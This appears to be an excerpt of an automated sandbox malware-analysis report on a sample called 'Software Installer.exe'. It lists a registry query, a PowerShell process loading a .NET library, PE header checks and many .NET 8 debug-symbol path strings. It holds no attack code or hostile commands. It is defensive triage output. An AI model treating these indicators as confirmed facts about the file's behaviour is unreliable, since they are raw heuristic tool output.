Source: C:\Users\user\Desktop\Software Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Software Installer.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Software Installer.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Software Installer.exeStatic file information: File size 68821148 > 1048576
Source: Software Installer.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x61ac00
Source: Software Installer.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17ca00
Source: Software Installer.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x147400
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Software Installer.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Software Installer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Software Installer.exe, 00000000.00000002.2652976429.000001D775200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655712102.000001D7781F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655625974.000001D778160000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649808115.000001D7732F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648012640.00000196DE210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: Software Installer.exe, 00000000.00000002.2655922975.000001D7782C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdb source: Software Installer.exe, 00000000.00000002.2655586732.000001D778140000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652602234.000001D775061000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652996729.000001D775210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655229213.000001D777EC1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655043542.000001D777CC0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2647654410.00000196DC880000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2653230217.000001D776CF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\Release\net8.0\System.Runtime.Serialization.Json.pdb source: Software Installer.exe, 00000000.00000002.2653928289.000001D777580000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655435986.000001D7780C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654964425.000001D777C50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654918441.000001D777C20000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654629650.000001D777A61000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652800615.000001D7750E0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652887365.000001D775171000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655922975.000001D7782C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652800615.000001D7750E0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652887365.000001D775171000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: Software Installer.exe, 00000000.00000002.2655879109.000001D7782A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Software Installer.exe, 00000000.00000002.2653948791.000001D777590000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA256v source: Software Installer.exe, 00000000.00000002.2653520316.000001D776DF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: Software Installer.exe, 00000000.00000002.2649945136.000001D773320000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652246216.000001D774FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: Software Installer.exe, 00000000.00000002.2654943566.000001D777C40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654538768.000001D777A21000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654880930.000001D777BE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653422218.000001D776DA1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653368487.000001D776D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653065772.000001D775261000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653138908.000001D775280000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: Software Installer.exe, 00000000.00000002.2654113621.000001D777640000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: Software Installer.exe, 00000000.00000002.2655566992.000001D778130000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: Software Installer.exe, 00000000.00000002.2655509664.000001D778110000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653187115.000001D776CC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Software Installer.exe, 00000000.00000002.2652519231.000001D775040000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649882906.000001D773301000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256j?X source: Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654475381.000001D7779B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656547373.000001D778871000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655509664.000001D778110000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653187115.000001D776CC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Software Installer.exe, 00000000.00000002.2652331382.000001D774FE0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652407174.000001D775011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\Release\net8.0\System.Runtime.Serialization.Json.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2653928289.000001D777580000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2653023838.000001D775240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2654943566.000001D777C40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654918441.000001D777C20000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654629650.000001D777A61000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655586732.000001D778140000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256: source: Software Installer.exe, 00000000.00000002.2653499701.000001D776DE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654475381.000001D7779B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: Software Installer.exe, 00000000.00000002.2652519231.000001D775040000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649882906.000001D773301000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/Release/net8.0-windows/Microsoft.Win32.SystemEvents.pdb source: Software Installer.exe, 00000000.00000002.2655900956.000001D7782B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Software Installer.exe, 00000000.00000002.2649763096.000001D7732D0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649696226.000001D7732B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653065772.000001D775261000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653138908.000001D775280000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: Software Installer.exe, 00000000.00000002.2655879109.000001D7782A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Drawing.Primitives.ni.pdb source: Software Installer.exe, 00000000.00000002.2655816250.000001D778281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655966920.000001D778340000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.NetworkInformation.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653300355.000001D776D31000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653250976.000001D776D00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655435986.000001D7780C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654964425.000001D777C50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649808115.000001D7732F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648012640.00000196DE210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2648087403.00000196DE281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648034270.00000196DE220000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Software Installer.exe, 00000000.00000002.2647707848.00000196DC8A1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647991281.00000196DE1F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653300355.000001D776D31000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653250976.000001D776D00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654538768.000001D777A21000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654880930.000001D777BE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Software Installer.exe, 00000000.00000002.2649945136.000001D773320000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652246216.000001D774FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2655509664.000001D778110000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653187115.000001D776CC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647807829.00000196DC8F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647763064.00000196DC8C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/Release/net8.0-windows/Microsoft.Win32.SystemEvents.pdbSHA256_ source: Software Installer.exe, 00000000.00000002.2655900956.000001D7782B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: Software Installer.exe, 00000000.00000000.1392144079.00007FF6A4578000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652602234.000001D775061000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652996729.000001D775210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654475381.000001D7779B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2648087403.00000196DE281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648034270.00000196DE220000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Software Installer.exe, 00000000.00000002.2653499701.000001D776DE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256sU4T source: Software Installer.exe, 00000000.00000002.2652800615.000001D7750E0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652887365.000001D775171000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: Software Installer.exe, 00000000.00000002.2652331382.000001D774FE0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652407174.000001D775011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2653023838.000001D775240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2655606492.000001D778150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Software Installer.exe, 00000000.00000002.2653520316.000001D776DF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdbSHA2564w5 source: Software Installer.exe, 00000000.00000002.2653948791.000001D777590000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655229213.000001D777EC1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655043542.000001D777CC0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Xml\Release\net8.0\System.Runtime.Serialization.Xml.pdb source: Software Installer.exe, 00000000.00000002.2654092565.000001D777630000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Software Installer.exe, 00000000.00000002.2649763096.000001D7732D0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649696226.000001D7732B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256u source: Software Installer.exe, 00000000.00000002.2655566992.000001D778130000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256CS source: Software Installer.exe, 00000000.00000002.2654113621.000001D777640000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256- source: Software Installer.exe, 00000000.00000002.2652976429.000001D775200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2647707848.00000196DC8A1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647991281.00000196DE1F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647807829.00000196DC8F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647763064.00000196DC8C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Xml\Release\net8.0\System.Runtime.Serialization.Xml.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2654092565.000001D777630000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655712102.000001D7781F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655625974.000001D778160000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: Software Installer.exe, 00000000.00000002.2653230217.000001D776CF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Software Installer.exe, 00000000.00000002.2647654410.00000196DC880000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256j source: Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655606492.000001D778150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256@ source: Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: Software Installer.exe, 00000000.00000002.2652733750.000001D775080000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmp
